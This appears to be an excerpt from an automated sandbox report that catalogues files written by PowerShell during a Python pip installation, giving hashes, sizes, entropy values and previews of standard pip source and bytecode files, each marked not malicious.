                                                                                                                                                                                                              MD5:C74199C4FB72079EFEEC39878B982CE1
                                                                                                                                                                                                              SHA1:D977F48235F7F7E3340FFE5A81FE9D7EA8AA0FCE
                                                                                                                                                                                                              SHA-256:40C7333626FE639FBB0C56973F276F7DD388E2BB6422D961CF47B12FCEC19E48
                                                                                                                                                                                                              SHA-512:DBBE13C654C6900519324CD3D87E0EA6FE233C988468131B4EAF014E391229028C6922B30758B243B0A2D2BBF517543997C23590584ABFED1F385BCA394EF7BF
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e~E.............................U.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l m!Z!..e.r.d.d.l.m"Z"..d.d.l#m$Z$..d.g.Z%e.e.e&e'f.........Z(e.e'g.e.e'e.f.....f.....Z)..e.jT..................d.e.jV..........................Z,..e.jT..................d.........Z-..e.jT..................d.........Z.e.j^..................e.j`..................e.jb..................e.jd..................e.jf..................e.jh..................e.jj..................e.jl..................e.jn..................e.jp..................e.jr..................e.jt..................e.jv..................e.jx..................g.Z=e.e.d.e.j|..................f.........e?d.<...e.j...................e.j...................e.j...................g.ZCe.e.d.e.j|..................f.........e?d.<...e.j...................g.ZDe.e.d.e.j|..................f.........e?d.<...eC
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):38343
                                                                                                                                                                                                              Entropy (8bit):5.281252697538927
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:NgqqB5KveBhBluXn0hnM0WOpysN77O+zerW9:NgqqBcWBWpQpy9G8S
                                                                                                                                                                                                              MD5:A43C3ABD11C7A85D80125255CA03233C
                                                                                                                                                                                                              SHA1:6F9CA3777EF032B9217F6E3E9582B63D9D6E0EA8
                                                                                                                                                                                                              SHA-256:A6737DE86C0E6092CE629C4B96F03C4B00D92FC3633B81E5B1A9D80AD09C42A4
                                                                                                                                                                                                              SHA-512:7B1CB282C5B090523C5ABAAB2621A1DE91564A80F3F1E73B7D4FDC708B6CCD87C9B4CDC671B59CE0EF1B9B2D0ED930181D9418F9A73A29F436E1C76BA12E9AAC
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e...............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l"m#Z#m$Z$..d.d.l%m&Z&m'Z'..d.d.l(m)Z)..d.d.l*m+Z+m,Z,m-Z-m.Z...d.d.l/m0Z0..d.d.l1m2Z2..d.d.l3m4Z4..d.d.l5m6Z6..d.d.l7m8Z8..d.d.l9m6Z:..d.d.l;m<Z=..d.d.l>m?Z?..d.d.l@mAZAmBZB..d.d.lCmDZD..d.d.lEmFZF..d.d.lGmHZH..d.d.lImJZJmKZKmLZLmMZMmNZNmOZOmPZPmQZQ..d.d.lRmSZS..d.d.lTmUZU..d.d.lVmWZWmXZX..d.d.lYmZZZ..d.d l[m\Z\..d.d!l]m^Z^....e.j...................e`........Za..G.d"..d#........Zbd$ebd%ecf.d&..Zdd'e.d(e.eb....d)ecd%eef.d*..Zfd'e.d(e.eb....d%d.f.d+..Zgy.),.....N)...Values)...Path)...Any..Collection..Dict..Iterable..List..Optional..Sequence..Union)...Marker)...Requirement)...SpecifierSet)...canonicalize_name)...Version)...parse)...BuildBackendHookCaller)...BuildEnvironment..NoOpBuildEnvironment)...InstallationError..PreviousBuildDirError).
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):7229
                                                                                                                                                                                                              Entropy (8bit):5.2421378151082525
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:juIvP5dNlHhvbUxtcZ5H2aupt0aq0hTFYmREJGKp8lfXtktpwkT5gUNQ:jTNlBvAxaf2B0anFLy7p819k395m
                                                                                                                                                                                                              MD5:CD2D1F51D4D1253D11C2270FB618E65A
                                                                                                                                                                                                              SHA1:BBC1858E610F2D490F117A316593B3A0303EA063
                                                                                                                                                                                                              SHA-256:369D51B05210D019A34365629957C15D8146B1B4D3D180E8EC4A026A97A38462
                                                                                                                                                                                                              SHA-512:EA97DB6653855B545FDA1CD3360D990DD3E8E36D84A69BCDC082D36DDDCE0C45131A411FCFCD9F84B267F9427D493A3ED696A3B8AF94B193E3A282AA31401F7B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e`..............................d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j ..................e.........Z...G.d...d.........Z.y.)......N)...OrderedDict)...Dict..List)...LegacySpecifier)...canonicalize_name)...LegacyVersion)...InstallRequirement)...deprecatedc..........................e.Z.d.Z.d.d.e.d.d.f.d...Z.d.e.f.d...Z.d.e.f.d...Z.d.e.d.d.f.d...Z.d.e.d.d.f.d...Z.d.e.d.e.f.d...Z.d.e.d.e.f.d...Z.e.d.e.e.....f.d...........Z.e.d.e.e.....f.d...........Z.d.d...Z.y.)...RequirementSet..check_supported_wheels..returnNc.....................>.....t.................|._.........|.|._.........g.|._.........y.).z.Create a RequirementSet.N).r......requirementsr......unnamed_requirements)...selfr....s.... .mC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/req/req_set.py..__init__z.RequirementSet.__init__....s.........<G..=......&<....#.>@....!.....c..........................t........
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):32986
                                                                                                                                                                                                              Entropy (8bit):5.2056266419612625
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:KP/s8b/te8cFqeSOlkn05Mm4/uZrwG/CtFCAx30Bb:KP/Zb/w1FfDACAxOb
                                                                                                                                                                                                              MD5:097AA3CD5F8B48E28343CE3804B7CECE
                                                                                                                                                                                                              SHA1:69BBEB4103A18572F01988DEA44DB85E69412F41
                                                                                                                                                                                                              SHA-256:ACEA99F020A29ABD0EF28DA507BD901E4A9A84649882518DFF51034A27035706
                                                                                                                                                                                                              SHA-512:1395C84C7BF667EAC2F210602F99E1AD813C009DF2D71519C150382C49415095D5782C1766AFA8B8458F93A4F9213D2C0E8B2315D3C9E9825F7525C517AEAC5E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e._..............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m Z m!Z!m"Z"..d.d.l#m$Z$m%Z%..d.d.l&m'Z'....e.e(........Z)d.e*d.e*d.e+d.e.e*d.d.f.....f.d...Z,d.e.d.e.e.d.d.f.....f.....d.e.d.e.e.d.d.f.....f.....f.d...Z-e-d.e.d.e.e*d.d.f.....f.d...........Z.d.e.e*....d.e.e*....f.d...Z/d.e.e*....d.e.e*....f.d...Z0d.e.e*....d.e.e.e*....e.e*....f.....f.d...Z1..G.d...d.........Z2..G.d...d.........Z3..G.d...d ........Z4y.)!.....N)...cache_from_source)...Any..Callable..Dict..Generator..Iterable..List..Optional..Set..Tuple)...UninstallationError)...get_bin_prefix..get_bin_user)...BaseDistribution)...WINDOWS)...egg_link_path_from_location)...getLogger..indent_log)...ask..normalize_path..renames..rmtree)...AdjacentTempDirectory..TempDirectory)...running_under_virtualenv..bin_dir..script_name..is_gui..returnc................#.......K.....t..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):19018
                                                                                                                                                                                                              Entropy (8bit):4.5153846504298185
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:bYk+ErtWMTIHs16EvJT7HpPw1FZresif6kckMFvGAgBCl4q:Drw57Wtoib/tAhL
                                                                                                                                                                                                              MD5:18D03004D257F83A9E3D4110530F71F3
                                                                                                                                                                                                              SHA1:95D491FF36169C0C5FFFE9AEE67B6A6FD10BECD9
                                                                                                                                                                                                              SHA-256:F21958E7A8A612D84B3914709A5A322B3DD83B25F298868AB0D07A3FD7B0BCD2
                                                                                                                                                                                                              SHA-512:5CA7D9B1309EE20B72D63534480740CAD441571AA4AE2695157849DC263657C1AED2087FB871D8B4EC990D2AB0A1C5D593680ACD2669190FF58999987C99895B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""Backing implementation for InstallRequirement's various constructors..The idea here is that these formed a major chunk of InstallRequirement's size.so, moving them and support code dedicated to them outside of that class.helps creates for better understandability for the rest of the code...These are meant to be used elsewhere within pip to create instances of.InstallRequirement.."""..import copy.import logging.import os.import re.from typing import Collection, Dict, List, Optional, Set, Tuple, Union..from pip._vendor.packaging.markers import Marker.from pip._vendor.packaging.requirements import InvalidRequirement, Requirement.from pip._vendor.packaging.specifiers import Specifier..from pip._internal.exceptions import InstallationError.from pip._internal.models.index import PyPI, TestPyPI.from pip._internal.models.link import Link.from pip._internal.models.wheel import Wheel.from pip._internal.req.req_file import ParsedRequirement.from pip._internal.req.req_install import InstallRequ
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):17790
                                                                                                                                                                                                              Entropy (8bit):4.538498148383151
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:u0aYhgUFZckXTdrk01YlroGD5CIPwSwiwv2+90P:uwZ/jdfs1tPwS/HP
                                                                                                                                                                                                              MD5:236D5B49A91A74A3AD27F50FA3FA2C3C
                                                                                                                                                                                                              SHA1:3BA2944C19D21912A4DA5ECFAF37EA692CCF1AC3
                                                                                                                                                                                                              SHA-256:33CB6D3992FE3F0023EEC70F125856DD90F68620FD9A6FFA14900621BC00CC42
                                                                                                                                                                                                              SHA-512:DCF14E141C1A2239E9CB3D0D1AFD89E2A6DCF1D3BA8F01D59D318382F2082CD4F4077948F4FB97C3318C6CF1993D4C4B1FFD9570D82B5B6C69C15B500AA122B5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:""".Requirements file parsing."""..import logging.import optparse.import os.import re.import shlex.import urllib.parse.from optparse import Values.from typing import (. TYPE_CHECKING,. Any,. Callable,. Dict,. Generator,. Iterable,. List,. Optional,. Tuple,.)..from pip._internal.cli import cmdoptions.from pip._internal.exceptions import InstallationError, RequirementsFileParseError.from pip._internal.models.search_scope import SearchScope.from pip._internal.network.session import PipSession.from pip._internal.network.utils import raise_for_status.from pip._internal.utils.encoding import auto_decode.from pip._internal.utils.urls import get_url_scheme..if TYPE_CHECKING:. # NoReturn introduced in 3.6.2; imported only for type checking to maintain. # pip compatibility with older patch versions of Python 3.6. from typing import NoReturn.. from pip._internal.index.package_finder import PackageFinder..__all__ = ["parse_requirements"]..ReqFileLines = Itera
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):35460
                                                                                                                                                                                                              Entropy (8bit):4.349820575274182
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:z+M0Pf6CKYptCGjRZMBm5m3ojz2JQw9u3W/3:zm6mptCWUqz2J9J/3
                                                                                                                                                                                                              MD5:DA54C14920379FE466FF0DA19B7028AC
                                                                                                                                                                                                              SHA1:9C22316E093B009D97FE5D36431C31099BF5CCA7
                                                                                                                                                                                                              SHA-256:C2D38FC64C9148CF1CA264E4B3CA0BD46A76A321AA6C7EC9C080D1722D9088F9
                                                                                                                                                                                                              SHA-512:F9DBEB8B249146AC2EA96C6BA277EA0F182E134DC8FC0570FC09642151E92E50A44626E90B5E4FBD52BE77C8DB48486C038063580B2065AAD954069336E41BDF
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import functools.import logging.import os.import shutil.import sys.import uuid.import zipfile.from optparse import Values.from pathlib import Path.from typing import Any, Collection, Dict, Iterable, List, Optional, Sequence, Union..from pip._vendor.packaging.markers import Marker.from pip._vendor.packaging.requirements import Requirement.from pip._vendor.packaging.specifiers import SpecifierSet.from pip._vendor.packaging.utils import canonicalize_name.from pip._vendor.packaging.version import Version.from pip._vendor.packaging.version import parse as parse_version.from pip._vendor.pyproject_hooks import BuildBackendHookCaller..from pip._internal.build_env import BuildEnvironment, NoOpBuildEnvironment.from pip._internal.exceptions import InstallationError, PreviousBuildDirError.from pip._internal.locations import get_scheme.from pip._internal.metadata import (. BaseDistribution,. get_default_environment,. get_directory_distribution,. get_wheel_distribution,.).from pip._inter
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4704
                                                                                                                                                                                                              Entropy (8bit):4.216083028637518
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:yqtq84IDbgjQvJUjASvpC319hi9uDh4FoN7z+ULtYKP/g23syOygj:dX73g+J2XI319sih20a2d/jlOyU
                                                                                                                                                                                                              MD5:0ADC2DA9F4F72B393701262DF03D5961
                                                                                                                                                                                                              SHA1:49A3ABAB94A935BDC119F167997A24FBF9417B41
                                                                                                                                                                                                              SHA-256:88C603513A12824C45CAB3FF3AB4ED3D2830E1DC234721910E91A8A13A9E0386
                                                                                                                                                                                                              SHA-512:DF5B6A8A61C2CBA426339D5633E81E29CD52C8DA8639D2E72BC0EF99E7AD29AF3597D71852C9BF963F15E7752BE6D3793C8B92BD86ACD74378D1F97BC1F0FD88
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import logging.from collections import OrderedDict.from typing import Dict, List..from pip._vendor.packaging.specifiers import LegacySpecifier.from pip._vendor.packaging.utils import canonicalize_name.from pip._vendor.packaging.version import LegacyVersion..from pip._internal.req.req_install import InstallRequirement.from pip._internal.utils.deprecation import deprecated..logger = logging.getLogger(__name__)...class RequirementSet:. def __init__(self, check_supported_wheels: bool = True) -> None:. """Create a RequirementSet.""".. self.requirements: Dict[str, InstallRequirement] = OrderedDict(). self.check_supported_wheels = check_supported_wheels.. self.unnamed_requirements: List[InstallRequirement] = [].. def __str__(self) -> str:. requirements = sorted(. (req for req in self.requirements.values() if not req.comes_from),. key=lambda req: canonicalize_name(req.name or ""),. ). return " ".join(str(req.req) for
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):24551
                                                                                                                                                                                                              Entropy (8bit):4.372446389382628
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:hd/9msLNLjyO1XZ8RvFuSjEiRMFfiGf0zdTjtAttm5QqglW:hd0sLpTGjECWqGf01jattm57glW
                                                                                                                                                                                                              MD5:17F5E081F34812C1B3BDFCCAB3FBE0E7
                                                                                                                                                                                                              SHA1:E3549EC01B2680F073048E2198EEBA53FAA5EEA5
                                                                                                                                                                                                              SHA-256:9E6BD341A4420B48AEFB94F0D1D8E55C98528FA5A6A8746F4F7AA4904742DF91
                                                                                                                                                                                                              SHA-512:A7414A1007A7845891F0C7CD6E5489CBB37BDF8F7BF72E8E0D2A7C788C4884D392A70C0DE121319C8A1F6E04996C3EC8E47ADAF27370D99D004A8D583688A5AD
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import functools.import os.import sys.import sysconfig.from importlib.util import cache_from_source.from typing import Any, Callable, Dict, Generator, Iterable, List, Optional, Set, Tuple..from pip._internal.exceptions import UninstallationError.from pip._internal.locations import get_bin_prefix, get_bin_user.from pip._internal.metadata import BaseDistribution.from pip._internal.utils.compat import WINDOWS.from pip._internal.utils.egg_link import egg_link_path_from_location.from pip._internal.utils.logging import getLogger, indent_log.from pip._internal.utils.misc import ask, normalize_path, renames, rmtree.from pip._internal.utils.temp_dir import AdjacentTempDirectory, TempDirectory.from pip._internal.utils.virtualenv import running_under_virtualenv..logger = getLogger(__name__)...def _script_names(. bin_dir: str, script_name: str, is_gui: bool.) -> Generator[str, None, None]:. """Create the fully qualified name of the files created by. {console,gui}_scripts for the given ``d
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):214
                                                                                                                                                                                                              Entropy (8bit):4.778249365437501
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:L2/VneB95/n23d6oAreKAyECP6Iaatgem/l:i/Vel/2ImbcPjaatHmt
                                                                                                                                                                                                              MD5:08CB757C64F8ACC6E1A86B38E5643A9A
                                                                                                                                                                                                              SHA1:AEB31073039912697204D7BB93DD5EB16C90C2F4
                                                                                                                                                                                                              SHA-256:BB88499C66C417D650560470DC58A548269ABDC0F99B5AFEAD1B476C21A52D84
                                                                                                                                                                                                              SHA-512:FC1FA906634E013FB1314C82CF3EAB7C6136F2C56DF0817D5B17038FEA9260F87F54C528D9383C4A77E5693B76878E4B1FAF22C827C832F6A0F0B185B4F972F6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e................................y.).N..r..........uC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/resolution/__init__.py..<module>r........s.........r....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1202
                                                                                                                                                                                                              Entropy (8bit):5.268044067831488
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:FngE2mUXesnxgrqjEA23YS6egO5lV3JElqbHFhs2DplJOn3EVuYf54hQ:OEjUXhBjEA2gOzbEefvd7lVuY4Q
                                                                                                                                                                                                              MD5:EC10004CF4D8BFF0037C317463F31771
                                                                                                                                                                                                              SHA1:86FD6F2E8D54407EE501F5BCE0CCD65CA43E8B54
                                                                                                                                                                                                              SHA-256:7DE7A6BB6AAB8158221B6CCD69519C01F5682806793DA33E3BA2A8FD7BB94ADB
                                                                                                                                                                                                              SHA-512:7BA450F0BD29B2A4BEDD24F36CD35EF165A7610D18995F142BA98FC54705BC5AC5F18AEF27C43884EEE5A0E63A4F138821E3FD2BC7583C7DB07AE2FA0343E078
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.eG.........................\.....d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.e.e.e.....g.e.f.....Z...G.d...d.........Z.y.)......)...Callable..List..Optional)...InstallRequirement)...RequirementSetc.....................<.....e.Z.d.Z.d.e.e.....d.e.d.e.f.d...Z.d.e.d.e.e.....f.d...Z.y.)...BaseResolver..root_reqs..check_supported_wheels..returnc...........................t.....................N....NotImplementedError)...selfr....r....s.... .qC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/resolution/base.py..resolvez.BaseResolver.resolve..............."..#..#.......req_setc...........................t...................r....r....).r....r....s.... r......get_installation_orderz#BaseResolver.get_installation_order....r....r....N)...__name__..__module__..__qualname__r....r......boolr....r....r......r....r....r....r........s@.........$.....0..1....$.KO....$.......$....$..%....$..... ..!....$r....r....N)...typingr....r....r......pip.
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):583
                                                                                                                                                                                                              Entropy (8bit):4.579538678497288
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:1REYB1/qMDgYSYqMWKiQFi3RHWkuGn4U4jSXxTZ2cfnU6ZKo7CGN2yQfny:1REq/cYIU8RHvuG4UCSXBZ2cPOCN25Py
                                                                                                                                                                                                              MD5:BBFA436B355A45AA3393C1E1AC9033F2
                                                                                                                                                                                                              SHA1:BB0A50E2866D29BB4C616CF2900FA3EB8EED3051
                                                                                                                                                                                                              SHA-256:AA59A1DF6E520557EF1BA31EF6073936C879B1DC07070CC706AE9A117B4AB0B0
                                                                                                                                                                                                              SHA-512:4AFE1CB158E4CA8FA05DE5B664CED2E6F3CA5126CEF3F124DB0A17FF95786FAA21434C11AF603774184264E5AD47D82E621E16FF78DDAF290DB2967331B530DB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from typing import Callable, List, Optional..from pip._internal.req.req_install import InstallRequirement.from pip._internal.req.req_set import RequirementSet..InstallRequirementProvider = Callable[. [str, Optional[InstallRequirement]], InstallRequirement.]...class BaseResolver:. def resolve(. self, root_reqs: List[InstallRequirement], check_supported_wheels: bool. ) -> RequirementSet:. raise NotImplementedError().. def get_installation_order(. self, req_set: RequirementSet. ) -> List[InstallRequirement]:. raise NotImplementedError().
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):221
                                                                                                                                                                                                              Entropy (8bit):4.8185555349856815
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:L2/Vney+u95/n23d6oAreKAyECGQ6Iaatgem/l:i/VeM/2ImbcGQjaatHmt
                                                                                                                                                                                                              MD5:FAA6A00D638CBA75126936C02BCD9F4D
                                                                                                                                                                                                              SHA1:12F24F8E93B6DB7EA9C2941C5582FB1F0DC424BD
                                                                                                                                                                                                              SHA-256:5A1B31CD3F5C888968ED2EE7FAB2BB568D1E455B97428D65329311B7F551FC1E
                                                                                                                                                                                                              SHA-512:E91087AB9FC6BD77CD8B6EE21E59DD5CFA0581C373E126E49DE94E1F445DC149C14765049EE71F53140F5AB128C57CBF0FEC1952025BD6410CA4D37B92D02EA3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e................................y.).N..r..........|C:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/resolution/legacy/__init__.py..<module>r........s.........r....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):22441
                                                                                                                                                                                                              Entropy (8bit):5.42917454983405
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:O4Htag8ghiaXwHN0pv+WPf5LXriO/HiDMCYK5viGfFihp+myUttVyR:fHtag8gtAtyv+WP9+nZdFihp0UttoR
                                                                                                                                                                                                              MD5:A8F05F3EE6D5248D0C9173CF3C88699F
                                                                                                                                                                                                              SHA1:9DDE8A4DDFFB503F58CEA866301D45DF66766324
                                                                                                                                                                                                              SHA-256:F2A5299FB599EF004B52F623984DA3F3D48E664719B528F3119C97F79ED35523
                                                                                                                                                                                                              SHA-512:8ADABF1554131535C513D9AD3ED558D4F09147D1055DD1A9B23C8C78B8765B3466D7389946C0BB87B0B0EC556EF654D80C011A6EB1A1A3773389C5933DCF852B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e.].............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l"m#Z#..d.d.l$m%Z%..d.d.l&m'Z'm(Z(..d.d.l)m*Z*..d.d.l+m,Z,m-Z-..d.d.l.m/Z/..d.d.l0m1Z1..d.d.l2m3Z3..d.d.l4m5Z5..d.d.l6m7Z7..d.d.l8m9Z9....e.jt..................e;........Z<e.e=e.e'....f.....Z>..d.d.e.d.e.e?e?e?f.....d.e@d.d.f.d...ZA..G.d...d.e,........ZBy.) ay...Dependency Resolution..The dependency resolution in pip is performed as follows:..for top-level requirements:. a. only one spec allowed per project, regardless of conflicts or not.. otherwise a "double requirement" exception is raised. b. they override sub-dependency requirements..for sub-dependencies. a. "first found, wins" (where the order is breadth first)......N)...defaultdict)...chain)...DefaultDict..Iterable..List..Optional..Set..Tuple)...specifiers)...Requirement)...WheelCache).
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):24025
                                                                                                                                                                                                              Entropy (8bit):4.301715348590666
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:4RHF/Uag88q0Dd/GZuutMCAK1iG/yNbdwXMm5QUl0:+lUag8/0DdegGRyNbdwcm5Qb
                                                                                                                                                                                                              MD5:9CD40F9B233AE35B269FE58D69CEBCB5
                                                                                                                                                                                                              SHA1:28A0853F100C0B441801B09796CEB2C032FFBC7A
                                                                                                                                                                                                              SHA-256:5E4DB88D0EB61AF2EBE0C73B22337FAA23BCF2AA740489B35663C8173F502CE1
                                                                                                                                                                                                              SHA-512:522A333673276A6101870E195F18D6B29B50F4B51B841DFA33422A77EF60805E0BE76CF3D2E7E611C75660C58ACD11072E6239063DCD041C009DC646B0967D3D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""Dependency Resolution..The dependency resolution in pip is performed as follows:..for top-level requirements:. a. only one spec allowed per project, regardless of conflicts or not.. otherwise a "double requirement" exception is raised. b. they override sub-dependency requirements..for sub-dependencies. a. "first found, wins" (where the order is breadth first)."""..# The following comment should be removed at some point in the future..# mypy: strict-optional=False..import logging.import sys.from collections import defaultdict.from itertools import chain.from typing import DefaultDict, Iterable, List, Optional, Set, Tuple..from pip._vendor.packaging import specifiers.from pip._vendor.packaging.requirements import Requirement..from pip._internal.cache import WheelCache.from pip._internal.exceptions import (. BestVersionAlreadyInstalled,. DistributionNotFound,. HashError,. HashErrors,. InstallationError,. NoneMetadataError,. UnsupportedPythonVersion,.
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):225
                                                                                                                                                                                                              Entropy (8bit):4.828939038937976
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:L2/VneON95/n23d6oAreKAyECOTE6Iaatgem/l:i/VeQ/2Imbc8EjaatHmt
                                                                                                                                                                                                              MD5:CFA8F3C77D3EAB93116013552B517568
                                                                                                                                                                                                              SHA1:CCA44B819BB9886AD2E2EF3B335975EC7D05C386
                                                                                                                                                                                                              SHA-256:C182154938380E868A81C508F80C0EB715A1BFAD49560048F98291CFF02299AE
                                                                                                                                                                                                              SHA-512:9E78A698157C000C2E368BFD3D961CACF2097A751F5244CFAF1DC49D07F9DA3A22198E11566F8FF6330BC6FBD36A24AB166F700E625D6C9B911C1E5307B55376
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e................................y.).N..r...........C:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/resolution/resolvelib/__init__.py..<module>r........s.........r....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8354
                                                                                                                                                                                                              Entropy (8bit):5.131740740122936
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:J4kTVCkbAo1Vziyd+O6f3N62MtejbpaWGecYfaQhZ0KYWc:JjCkUo/dy3Mm7GeFfLhe3
                                                                                                                                                                                                              MD5:CF16CAFF8C5C2E757D935B8D62F8BD58
